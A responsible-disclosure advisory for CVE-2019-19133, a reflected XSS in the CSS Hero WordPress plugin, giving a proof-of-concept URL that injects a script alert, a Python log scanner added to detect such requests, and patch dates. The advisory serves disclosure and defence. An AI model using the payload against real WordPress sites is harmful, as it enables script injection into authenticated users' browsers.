Team,  
  
  
Document Title  
  
===============  
  
CVE-2019-19133  
  
Reflected XSS in CSS Hero (<= v.4.0.3) WordPress plugin.  
  
  
  
Product Description  
  
===============  
  
CSS Hero WordPress Plugin  
  
A live WordPress Theme editor that works without modifying any of your  
theme files. Very low performance footprint: only generates and adds a  
single static CSS file to your site.  
  
Homepage: https://www.csshero.org/  
  
  
  
CSS Hero is vulnerable to a reflected XSS attack (authenticated).  
  
  
  
PoC  
  
===============  
  
Steps:  
  
1) Authenticate to the WordPress application with the CSS Hero plugin installed.  
  
2) Navigate to the following vulnerable link:  
  
  
  
hxxp://vulnerable.wordpress.com/?csshero_action=edit_page&rand=1015&foo%22%3E%3C/iframe%3E%3Cscript%3Ealert(%27Reflected%20XSS%20in%20CSS%20Hero%204.0.3%27)%3C/script%3E%3Ciframe%3Ebar
  
3) JavaScript executes within the context of the browser. The  
arbitrary parameter and value are reflected into the returned HTML.  
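
For defenders checking access logs for the request in step 2, the following is an added example, not part of the original advisory or the plugin's code. It assumes a combined-style access log; the function names and the sample log lines are constructed for illustration. Because the payload is a bare parameter name with no "=", the parser must keep blank values or the parameter is silently dropped.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Characters that let a reflected name or value break out of an HTML attribute or tag.
HTML_META = re.compile(r'[<>"\']')

# Request field of a combined-style log line: "METHOD target HTTP/x.y" (assumed format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def suspicious_params(target):
    """Return decoded (name, value) pairs of a CSS Hero editor request that contain HTML metacharacters."""
    query = urlsplit(target).query
    # keep_blank_values=True matters: the advisory's payload is a parameter
    # name without "=", which parse_qsl discards by default.
    pairs = parse_qsl(query, keep_blank_values=True)
    if ("csshero_action", "edit_page") not in pairs:
        return []
    # Check names as well as values: the advisory states both are reflected.
    return [(k, v) for k, v in pairs if HTML_META.search(k) or HTML_META.search(v)]


def scan(log_lines):
    """Return (line_number, flagged_pairs) for every log line worth reviewing."""
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match:
            flagged = suspicious_params(match.group(1))
            if flagged:
                hits.append((lineno, flagged))
    return hits


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2020:10:00:01 +0000] "GET /?csshero_action=edit_page&rand=1015 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2020:10:00:07 +0000] "GET /?csshero_action=edit_page&rand=1015&foo%22%3E%3C/iframe%3E%3Cscript%3Ealert(%27Reflected%20XSS%20in%20CSS%20Hero%204.0.3%27)%3C/script%3E%3Ciframe%3Ebar HTTP/1.1" 200 5301',
    '203.0.113.5 - - [01/Jan/2020:10:00:09 +0000] "GET /?s=%3Cb%3E HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for lineno, params in scan(SAMPLE_LOG):
        print(lineno, params)
```

A hit means the request should be reviewed; whether script actually ran depends on the installed plugin version (patched in v.4.0.7 per this advisory).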
  
  
  
Responsible Disclosure Information  
  
===============  
  
Vendor Contacted: 11/17  
  
Date Patched: 11/20  
  
Patched Version: v.4.0.7  
  
Public Disclosure: 12/2  
  
  
  
Cary Hooper  
  
@nopantrootdance